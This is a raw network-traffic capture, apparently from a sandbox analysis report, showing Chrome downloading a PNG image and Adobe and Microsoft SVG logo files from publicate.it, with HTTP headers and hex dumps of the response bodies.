                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FFFBQF%2FbfrGlCGAI9MJop65Hr8N8xzWP9DXFqroHVPRlOXUOlHkoEZL0QCHuwUoUMKZ3ClVxoV1SJdLKWTiyUjQoXQ%2BpJ50X1Ku0eoMt477ekQ4xPEMYHLcFvI55Jw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615c86d3a4259-EWR
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC620INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 02 62 08 03 00 00 00 06 df c0 7b 00 00 03 00 50 4c 54 45 0c 0c 0c 62 61 62 1e 1e 1e 81 43 fe 01 01 01 00 00 00 01 01 01 4c 69 71 02 02 02 00 00 00 ff ff fb ff ff fd ff ff fc cd ca d1 91 5e f7 94 63 f4 fb f9 fd fd ff ff cf cc d6 ff ff fe e6 e4 ea d6 70 8c f8 f8 f6 f4 f3 f5 fb fc f9 ff ff fb ff ff fc c8 6b a3 0f 0f 0f b5 67 c1 d6 ab c4 c9 a6 c6 8b 51 fe 8b 52 fe 8b 53 fe 8b 51 fd 8a 51 fe 8b 50 fe 8b 50 fd 8b 52 fd 8a 51 fd 8a 50 fe 8c 51 fe 8a 50 fd 8b 51 ff ff d7 cd fd d7 ce 8c 52 ff 89 4e ff fe d7 ce fe d8 cd 87 4c ff 88 4e ff 8c 52 fd 8c 51 fd 88 4d ff ff dc cc 8a 4f ff 8a 52 ff 8b 52 fd 8c 54 fe 86 4f ff 86 4a ff ff da cd 8a 4c ff 8d 56 fe 8c 53 fc 87 4c fe 8e 4e fe 84 48 ff 8f 55 fb df
                                                                                                                                                                                                        Data Ascii: PNGIHDRb{PLTEbabCLiq^cpkgQRSQQPPRQPQPQRNLNRQMORRTOJLVSLNHU
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: df b9 d7 a4 6d c4 d7 a7 65 8d 6f f1 c7 95 81 8d 77 ee dd 65 77 b5 5b b4 db ac 5b a1 74 fe ab 82 fe 9a 62 ef 75 5f fe 8f 9a e0 d5 a3 c6 ae 78 b2 ad 76 e2 b1 5a ba 70 63 fe b3 7d a8 eb e4 d1 f3 de cf 8c 6b f2 be 9f fe c4 92 87 b5 7f dc dc ca ff ab 58 c4 b6 82 a2 c9 94 cf c2 8d d3 b9 85 9b e5 66 6d ca af fe bf 8b 91 b4 90 fe bc 87 d8 ae 59 bf bd 89 96 d4 bf ff dc aa c2 4e 7a fd f4 69 5a f5 f0 fa 8f ac d9 8f a3 dd c1 8d 8c e7 dc ff f4 c2 31 e5 b5 4b e6 b3 bc fd f0 ec f8 bd b1 fa 99 8b f8 aa 9e e2 e7 ff f5 e4 cd f5 86 7d fd c9 be eb eb ee d1 bb dd fd d4 85 d8 88 af 83 a3 e5 6e 00 00 00 20 74 52 4e 53 02 0c 0f fc 05 07 0b 00 03 01 c0 c0 d4 1a fc fe fe c0 31 ec 4a fc 86 6a 9a ae c7 fd 01 fd f2 e4 1b 12 a8 7d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00
                                                                                                                                                                                                        Data Ascii: meowew[[tbu_xvZpc}kXfmYNziZ1K}n tRNS1Jj}pHYs
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: ed fb 5a eb 50 29 1d d7 4e c6 e7 6a c6 f7 1d ae 8e 7d df d7 2e 8a e6 7b 8f 1e f5 e6 6b 46 fb c6 c7 45 da 8f 7d 65 94 af 7c 17 c6 ec dd 28 ed 5c e4 83 e6 2e 6a ce 2f 8d 8f 2f ad cf d4 e4 b5 3e 3e 3e 57 53 46 c5 4a eb ab 77 8f 36 2b 8d 54 2b e5 5c ec 6b 1f 77 8d 7d 3f 56 4a 6b ab fd 58 19 a5 6c a3 51 bc f1 e4 e9 5e 3d d4 06 dd fb be 53 5a 55 eb 77 56 db 65 ad 2b 5b 47 9b 95 24 d6 ca 3a 6d 7d a5 d2 e2 f6 c6 56 a5 5a d9 db df bc d4 d0 5a 61 d0 46 eb e2 d6 6e fb fe fd d1 b2 0a 31 15 e8 5d 39 34 57 d5 fa ad d5 6e 49 bb d8 8f 95 d5 1c bc c6 a4 58 a7 ac c2 e4 a2 7d a8 23 23 cd 7d 2d d7 b3 1b 69 6e f0 2f ba b3 2a 64 6b c5 d1 a8 41 fb 58 69 4e b8 0d 12 fb ed af fc ea 83 57 bf f8 f2 f9 0b 7f 60 b3 ff 36 d1 69 a6 81 e6 9f fd f2 ab ff fb df 54 c2 aa 8a 31 28 a5 94 01
                                                                                                                                                                                                        Data Ascii: ZP)Nj}.{kFE}e|(\.j//>>>WSFJw6+T+\kw}?VJkXlQ^=SZUwVe+[G$:m}VZZaFn1]94WnIX}##}-in/*dkAXiNW`6iT1(
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 9a c1 2e 77 f3 50 c3 b8 f3 b9 3c 34 74 02 87 e9 03 d5 bc 04 4f 6c 9a cd b9 a5 f1 a5 a8 e6 9a f3 e3 4b b5 9a df 74 f3 c7 7d d0 bb 0f 83 ad e6 02 65 7d 5b ad ac ed 6f 15 13 74 af 62 91 28 ea c3 3b 1d 2b b1 b8 bd fb e4 68 b3 58 a5 d6 e4 51 41 c2 14 36 ea 5b 47 9b 85 aa 0e ae de df 68 97 34 56 b8 a7 02 03 99 a5 8b 77 77 db 85 62 f7 e8 56 29 08 b8 82 c1 57 4b 77 1e 6f 1f 6d 55 c0 b7 31 0f 06 32 3c 30 5a 27 95 5b bb dd 82 36 26 f0 30 33 9c 9b 30 34 e0 1b c2 69 b8 47 f2 ed cc 85 82 37 b1 e1 36 16 3a 62 f8 9e f1 06 6b 24 64 ef f9 68 38 58 eb 0c 98 02 1b 37 b2 07 87 53 c3 a3 df fd d9 ef a7 fa f3 44 17 fe 7f ee fc e7 3e f3 b5 bf 1a bd ac 52 90 c6 7f 46 74 d1 e2 9c d6 90 e8 1a 74 36 e0 f6 4e 05 81 e7 69 ad 53 15 80 e8 21 68 6e 4c 48 92 72 2e f0 a4 2a 10 f6 8e f9 09
                                                                                                                                                                                                        Data Ascii: .wP<4tOlKt}e}[otb(;+hXQA6[Gh4VwwbV)WKwomU12<0Z'[6&0304iG76:bk$dh8X7SD>RFtt6NiS!hnLHr.*
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: a5 d1 c9 f8 89 a9 d5 d6 7b e3 27 b6 29 72 57 f6 24 d6 b7 31 26 22 5d cd fc fa 52 6f bc 77 32 af 6a 4d d1 f0 c8 b4 b5 35 cd e8 64 7c 09 aa fb 7a 6d 7d 7c bd 46 e9 51 bd d4 da b8 75 95 ab 12 77 06 87 54 1c a0 0c 45 e9 6a a9 b3 f5 f4 c9 93 3b ed 52 4a ce 2b ea bc 28 72 81 a9 9f ee c2 1b a7 75 f1 ce 46 ab 94 1b 00 e2 17 49 68 a7 87 f0 d2 6e 15 f9 bc da a8 54 17 6f ec 6e 1c 74 42 48 43 5a ba 32 2d d5 ca d6 ee f6 a5 54 7a e7 4e cf 47 f3 a1 a9 3c 6b 2f 8f 2e dc 92 b6 84 4e d3 46 ae b4 3f a7 c6 e7 cd 73 c5 67 d0 5c 04 43 aa 46 67 97 db 33 90 55 a3 3f 03 83 bf f0 21 20 d5 19 d1 c9 dc cf 5d 38 ff 25 30 f7 40 45 ca 78 d8 a1 3a ce d5 31 98 8e 50 33 f3 1b 63 fa 8c 81 ee 98 3b d6 c0 86 a0 d7 79 4e 94 21 34 1b b0 1b 21 b5 75 90 06 50 03 64 cc d0 b4 b4 6a f6 fa 51 60 a2
                                                                                                                                                                                                        Data Ascii: {')rW$1&"]Row2jM5d|zm}|FQuwTEj;RJ+(ruFIhnTontBHCZ2-TzNG<k/.NF?sg\CFg3U?! ]8%0@Ex:1P3c;yN!4!uPdjQ`
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 98 6c 71 18 5a 6b 2c 34 51 46 27 45 da d0 4c a7 82 a7 4c 18 d3 d9 05 8e e3 4c 18 23 30 60 c2 90 11 50 d8 f9 4e 85 58 9a b1 b2 31 18 87 41 97 be 6f 9d 83 07 d6 ba d8 28 b7 0e 75 bc 16 cd cc 1f 2f 21 d6 d2 03 b1 e7 e6 1c 88 5d 8b 22 6c 10 c8 78 65 6d 0c cf 01 24 64 88 58 98 f1 11 8f eb cf cd f5 96 e6 7a fd 19 0b 47 fe 7a 0d 42 3c d4 70 78 8f c5 9a 23 50 06 ec 50 ac 32 15 87 2a 29 b6 1f 3f 7d f2 74 ab 53 ae 6a 17 86 1a 03 02 b3 8d c3 30 44 90 33 1c 3b 5d ed 16 74 ec bb 58 e7 bb 3a 84 e3 49 99 d0 86 56 2b e8 76 05 ed 1a 85 f6 ea 01 22 29 bc bc 51 dc 7c 7a 70 2d d4 b1 31 be 1f 86 2e 84 f9 5a 84 4b b0 01 97 0a 6c 69 0b 19 a1 31 1a ab c2 30 34 c6 c7 e4 0d da c3 4f 17 5a 1f 3f 23 96 6a 42 eb eb ec e6 72 37 cb b2 ee f5 9d 9d eb 2d c8 76 93 37 a7 93 46 46 13 22 4c
                                                                                                                                                                                                        Data Ascii: lqZk,4QF'ELLL#0`PNX1Ao(u/!]"lxem$dXzGzB<px#PP2*)?}tSj0D3;]tX:IV+v")Q|zp-1.ZKli104OZ?#jBr7-v7FF"L
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 4d 74 67 02 cd 70 08 46 63 94 87 b8 a6 a7 22 2e 29 0f 7e 2c b8 c4 93 ec f6 e1 54 a6 01 66 b0 7f f9 b5 2f 5f 38 77 01 0a fc 33 a2 8b ea 7e e1 dc 4b 7f f1 ca 2f bf fd 15 95 60 5e 41 54 3a 0a a0 bc 50 78 88 f6 2e ba 3a dd 2d 12 55 00 ae 80 ae df 01 ac 8a 6b 84 bb c2 e0 01 28 a7 64 05 e7 02 08 a1 4b d1 fc 8d ae 9d 8c 9f ac 1f f7 c7 fb f3 11 fc 2d 12 54 87 e4 47 24 3d 77 36 41 bd a2 77 50 02 e2 be 8a 54 88 6d 6e a0 c0 d5 b4 3f d7 eb 03 6f 05 0b 01 4e dd 93 9a 8b 11 ca 0d 8a 5b 1b db 97 d2 18 cd 43 02 9a a0 e8 2a dd 28 b5 4e 9f 3e 5c 5d ed 5e 02 82 8a 08 33 a5 7c ea d1 f8 39 8e b0 8f f7 b7 2a 26 00 bb 82 76 d0 39 38 28 e5 ce 47 a1 88 d6 c5 83 83 4e 59 03 c3 95 14 5a fb 0f af fa 70 f4 a7 e5 d6 ea 93 fb 1d 10 5d 62 78 3a 6c 1f ac b6 4a 55 27 6a 39 9f 1a 31 92 7c
                                                                                                                                                                                                        Data Ascii: MtgpFc".)~,Tf/_8w3~K/`^AT:Px.:-Uk(dK-TG$=w6AwPTmn?oN[C*(N>\]^3|9*&v98(GNYZp]bx:lJU'j91|
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 2c 42 54 18 a8 68 1c 0d 26 2e cd 56 96 bb 59 9a 64 2b cb 2b 25 74 8c 50 10 a9 9e 25 dc 13 0a 16 36 1c dd 74 f8 89 70 90 67 2d b5 96 af 67 80 b6 79 e1 5f 7d fd 8b 24 fa 85 df 22 fa b9 73 2f 9f ff d2 07 7f 7b e9 b2 f2 54 9a 2a a4 68 20 68 0a e4 0c 41 a8 60 ef 09 50 af 5a 47 2a 8a 3c c6 d2 18 35 81 e6 96 7a 82 ef 82 15 2e c8 78 6a ed 39 92 96 1a b7 07 b7 31 81 52 f4 74 8a d0 13 c8 45 8a 0b 09 9a a5 ee 06 a8 0c ee 02 95 80 36 07 9f 03 4d a3 28 86 68 ab 9d 8c 1f 03 27 85 9d 7d 5c 43 76 8c ef 52 e0 a1 e7 c7 8f 23 c7 a9 d4 49 91 e9 05 da 07 b2 4f 3b 74 ea d2 4b dd d5 8d 6e 7b e3 a0 5d 48 39 1a ca f0 88 3e 19 04 8a 22 3f 2d 74 ee 1c 6d d5 53 d1 56 c9 9d 12 12 3d 11 45 2e 50 41 e2 80 a4 41 58 25 42 83 44 57 81 94 2b 26 41 52 dc dc 85 7f ce 21 00 00 20 00 49 44 41
                                                                                                                                                                                                        Data Ascii: ,BTh&.VYd++%tP%6tpg-gy_}$"s/{T*h hA`PZG*<5z.xj91RtE6M(h'}\CvR#IO;tKn{]H9>"?-tmSV=E.PAAX%BDW+&AR! IDA
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 07 8b ec 01 54 78 e7 01 23 87 bb 70 30 18 0d c3 16 30 03 67 5a 3b ff c7 5b 97 b4 73 cf 88 0e fe 2e 44 a7 1e f7 51 21 7a 81 1c 46 1c 42 1e 00 b1 82 c6 12 87 08 7f 8b 73 48 3e fe b2 54 5f 07 66 5c ae b1 51 07 12 8b 8f 51 36 c0 04 72 2c 05 96 93 e4 41 e5 02 42 38 77 9e d2 20 21 7a d1 48 a1 0c 0a 13 19 44 ef f1 5d e4 8d cc 8d f7 6d 93 e0 3a ec f1 66 bf 67 e0 3c 54 1e 57 43 13 b7 90 cd 5b bc b3 8a 58 3a 7a c3 0e 4a f5 d8 dd a7 5b 45 c2 2a a0 1e a7 40 cf f3 ca 3c 87 a4 a1 eb 9b 1b ab db 15 48 29 42 c0 78 47 e5 06 8a 5c 00 8b 05 b2 43 57 eb b7 f6 5b d8 7c 80 a3 f3 29 1b f5 5b 47 db 85 ca d6 46 1b dd 57 b5 ae 16 b7 8f ee 8c 51 d4 3c 83 0e 8a 92 95 83 c5 06 30 ec bc 81 8c 86 09 02 7c 1a 79 66 cf a4 3a 9b 58 1c a5 10 4a b2 a9 e5 89 89 7b 37 3b e5 6a aa 7c 93 84 a3
                                                                                                                                                                                                        Data Ascii: Tx#p00gZ;[s.DQ!zFBsH>T_f\QQ6r,AB8w !zHD]m:fg<TWC[X:zJ[E*@<H)BxG\CW[|)[GFWQ<0|yf:XJ{7;j|
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 14 09 8b 9b f0 3b 44 66 06 4b 5a a2 83 e4 4c 6c 0b 74 f4 40 76 3e f3 e9 30 28 08 21 c1 5e c0 e1 73 9f 0f dd af 68 e1 c3 74 3e bb 23 d1 25 ca 67 62 44 0d 66 68 6d a6 b7 a4 a2 a8 b7 d4 14 c5 25 1a 59 1a 9f 6f 32 3d 98 ed 3d 5d b9 b5 da 2a 20 48 a2 ad f5 03 3a 4a 52 54 21 29 22 6d c0 17 97 32 9d e0 4a 87 95 ed c7 47 77 5a 88 a9 60 34 78 a8 41 e8 10 37 55 43 08 ad 86 94 be 34 d8 da 1b 77 8a 11 6f 94 2f 1b 4f ab ca e9 c1 d8 f6 ea c6 d1 8d 4b 9e 12 4c 65 1e 49 96 46 90 8d 83 9c 24 26 78 e6 dd e7 15 2f a4 08 49 8e 81 38 33 81 c5 38 ce 66 a1 bd 0f 68 91 96 da 8b 3b d7 af 1f 2e 4f bb 19 a5 55 36 b9 d0 1e 96 91 49 00 2f cf 40 14 7e 01 44 ec 68 52 bc f6 eb 77 de fa 1d a2 e7 31 b6 7c a7 43 ed be a8 a4 40 0c c3 63 40 55 43 96 e5 48 52 49 04 44 04 c5 47 a9 04 fe 94 ab
                                                                                                                                                                                                        Data Ascii: ;DfKZLlt@v>0(!^sht>#%gbDfhm%Yo2==]* H:JRT!)"m2JGwZ`4xA7UC4wo/OKLeIF$&x/I838fh;.OU6I/@~DhRw1|C@c@UCHRIDG


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        93192.168.2.549871104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC697OUTGET /images/adobe.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC750INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:24 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 4218
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "107a-620aa1d10297b"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f61%2B20cqvsVBMeEjYmGcCCNEweHMnSAtHTHBaL6izVMmxD7AjwnsKL8oZ4WXToM%2F2dKXJX1PW6ygGZFAqIzK7BNYYXcHI%2FLJ1TVCyvveWWa8L0UqemjIsBRBmQyhdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615c93c127c9f-EWR
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC619INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 41 64 6f 62 65 20 49 6c 6c 75 73 74 72 61 74 6f 72 20 31 34 2e 30 2e 30 2c 20 53 56 47 20 45 78 70 6f 72 74 20 50 6c 75 67 2d 49 6e 20 2e 20 53 56 47 20 56 65 72 73 69 6f 6e 3a 20 36 2e 30 30 20 42 75 69 6c 64 20 34 33 33 36 33 29 20 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 73 76 67 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 53 56 47 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 47 72 61 70 68 69 63 73 2f 53 56 47 2f 31 2e 31 2f 44 54 44 2f 73 76 67 31 31 2e 64 74 64 22 3e 0d 0a 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?>... Generator: Adobe Illustrator 14.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 43363) --><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 32 38 2c 34 2e 32 34 6c 31 36 2e 38 34 36 2c 34 30 2e 33 33 31 56 34 2e 32 34 48 33 32 2e 34 32 38 7a 20 4d 33 2e 37 30 31 2c 34 2e 32 34 76 34 30 2e 33 33 31 4c 32 30 2e 35 36 2c 34 2e 32 34 48 33 2e 37 30 31 7a 20 4d 31 39 2e 31 32 38 2c 33 36 2e 34 35 39 68 37 2e 38 35 35 0d 0a 09 6c 33 2e 32 31 2c 38 2e 31 31 32 68 37 2e 30 33 34 4c 32 36 2e 34 39 35 2c 31 39 2e 31 30 33 4c 31 39 2e 31 32 38 2c 33 36 2e 34 35 39 7a 22 2f 3e 0d 0a 3c 70 61 74 68 20 64 3d 22 4d 37 33 2e 33 33 32 2c 34 2e 31 33 34 6c 2d 39 2e 31 32 2c 34 30 2e 34 33 38 68 35 2e 35 32 6c 32 2e 34 2d 31 31 2e 31 35 39 68 38 2e 34 6c 32 2e 33 34 2c 31 31 2e 31 35 39 68 35 2e 35 38 6c 2d 38 2e 35 38 2d 34 30 2e 34 33 38 48 37 33 2e 33 33 32 7a 20 4d 37 32 2e 37 39 32 2c 32 38 2e 39 31 32 6c
                                                                                                                                                                                                        Data Ascii: 28,4.24l16.846,40.331V4.24H32.428z M3.701,4.24v40.331L20.56,4.24H3.701z M19.128,36.459h7.855l3.21,8.112h7.034L26.495,19.103L19.128,36.459z"/><path d="M73.332,4.134l-9.12,40.438h5.52l2.4-11.159h8.4l2.34,11.159h5.58l-8.58-40.438H73.332z M72.792,28.912l
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 33 7a 20 4d 31 34 36 2e 32 31 32 2c 34 30 2e 33 31 32 63 2d 31 2e 31 34 31 2c 30 2d 32 2e 38 38 2d 30 2e 37 32 31 2d 33 2e 37 38 2d 34 2e 32 36 0d 0a 09 63 2d 30 2e 31 38 2d 30 2e 34 37 39 2d 30 2e 32 33 39 2d 31 2e 31 34 31 2d 30 2e 32 33 39 2d 31 2e 38 30 31 76 2d 38 2e 31 35 38 63 30 2d 30 2e 36 30 32 2c 30 2e 30 36 31 2d 31 2e 33 38 31 2c 30 2e 31 38 31 2d 31 2e 39 38 63 30 2e 34 32 2d 32 2e 31 2c 31 2e 39 32 2d 34 2e 33 32 2c 33 2e 37 37 38 2d 34 2e 33 32 0d 0a 09 63 33 2e 33 36 2c 30 2c 34 2e 36 38 32 2c 34 2e 35 2c 34 2e 36 38 32 2c 31 30 2e 30 38 43 31 35 30 2e 38 33 32 2c 33 35 2e 38 37 32 2c 31 34 39 2e 35 37 31 2c 34 30 2e 33 31 32 2c 31 34 36 2e 32 31 32 2c 34 30 2e 33 31 32 7a 20 4d 31 36 39 2e 37 37 33 2c 31 34 2e 39 33 33 63 2d 36 2e 30 36
                                                                                                                                                                                                        Data Ascii: 3z M146.212,40.312c-1.141,0-2.88-0.721-3.78-4.26c-0.18-0.479-0.239-1.141-0.239-1.801v-8.158c0-0.602,0.061-1.381,0.181-1.98c0.42-2.1,1.92-4.32,3.778-4.32c3.36,0,4.682,4.5,4.682,10.08C150.832,35.872,149.571,40.312,146.212,40.312z M169.773,14.933c-6.06
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC861INData Raw: 2c 31 2e 30 33 37 2c 31 2e 31 30 32 43 31 37 39 2e 32 31 32 2c 31 36 2e 37 37 31 2c 31 37 38 2e 37 35 31 2c 31 37 2e 32 36 32 2c 31 37 38 2e 31 37 35 2c 31 37 2e 32 35 36 7a 20 4d 35 31 2e 34 39 36 2c 34 2e 32 34 48 35 31 2e 34 39 0d 0a 09 63 2d 30 2e 37 31 2c 30 2d 31 2e 32 38 36 2c 30 2e 35 37 37 2d 31 2e 32 38 36 2c 31 2e 32 39 37 63 30 2c 30 2e 37 33 32 2c 30 2e 35 37 36 2c 31 2e 33 30 33 2c 31 2e 32 38 36 2c 31 2e 33 30 33 63 30 2e 37 31 35 2c 30 2c 31 2e 32 37 39 2d 30 2e 35 37 2c 31 2e 32 37 39 2d 31 2e 33 30 33 0d 0a 09 43 35 32 2e 37 37 2c 34 2e 38 31 37 2c 35 32 2e 32 30 35 2c 34 2e 32 34 2c 35 31 2e 34 39 36 2c 34 2e 32 34 7a 20 4d 35 31 2e 34 39 36 2c 36 2e 36 33 39 63 2d 30 2e 35 37 37 2c 30 2d 31 2e 30 34 33 2d 30 2e 34 38 34 2d 31 2e 30 34
                                                                                                                                                                                                        Data Ascii: ,1.037,1.102C179.212,16.771,178.751,17.262,178.175,17.256z M51.496,4.24H51.49c-0.71,0-1.286,0.577-1.286,1.297c0,0.732,0.576,1.303,1.286,1.303c0.715,0,1.279-0.57,1.279-1.303C52.77,4.817,52.205,4.24,51.496,4.24z M51.496,6.639c-0.577,0-1.043-0.484-1.04


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        94192.168.2.549872104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC701OUTGET /images/microsoft.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC750INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:24 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 6391
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "18f7-620aa1d0f2f7a"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kBxsKo8P0GhtxcWxlXTv1jbDt%2BDnSg8CwBMj8%2FIHOMzmw3Y6VsIiN0TuEmHvhJ0pKgWLOLabXFu%2Bywjsezw6vwGkhA8rOG8k22NmVcFi5MCwTKBrr25nWK9rVlGyvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615c93c2a42c6-EWR
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC619INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0a 3c 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 41 64 6f 62 65 20 49 6c 6c 75 73 74 72 61 74 6f 72 20 32 32 2e 31 2e 30 2c 20 53 56 47 20 45 78 70 6f 72 74 20 50 6c 75 67 2d 49 6e 20 2e 20 53 56 47 20 56 65 72 73 69 6f 6e 3a 20 36 2e 30 30 20 42 75 69 6c 64 20 30 29 20 20 2d 2d 3e 0a 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 69 64 3d 22 4c 61 79 65 72 5f 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 3d 22 30 70 78 22 20 79 3d 22
